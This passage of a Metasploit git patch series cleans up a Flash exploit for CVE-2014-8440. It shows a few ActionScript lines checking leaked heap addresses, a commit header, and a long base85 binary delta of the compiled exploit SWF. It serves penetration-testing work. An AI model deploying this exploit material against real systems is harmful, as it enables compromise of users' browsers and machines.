-			Logger.log("[*] stack_object: " + stack_object.toString(16))
             payload_space_object = ev.at(pos + 3) - 1
-			Logger.log("[*] payload_space_object: " + payload_space_object.toString(16))
             if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
                 return false
             }

From e5d6c9a3cb2605afee776137d59ad5e50e99360b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 9 Jun 2015 16:01:29 -0500
Subject: [PATCH 0371/1013] Make last code cleanup

---
 data/exploits/CVE-2014-8440/msf.swf           | Bin 21802 -> 21291 bytes
 .../source/exploits/CVE-2014-8440/Exploit.as  | 139 ------------------
 .../source/exploits/CVE-2014-8440/Logger.as   |   2 +-
 ...obe_flash_uncompress_zlib_uninitialized.rb |   2 +-
 4 files changed, 2 insertions(+), 141 deletions(-)

diff --git a/data/exploits/CVE-2014-8440/msf.swf b/data/exploits/CVE-2014-8440/msf.swf
index a677624095bb658d2f57c442ae2f83125c20c94a..5062779ed8ed1f536564ca73805bc38d7ef16b60 100755
GIT binary patch
delta 21176
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
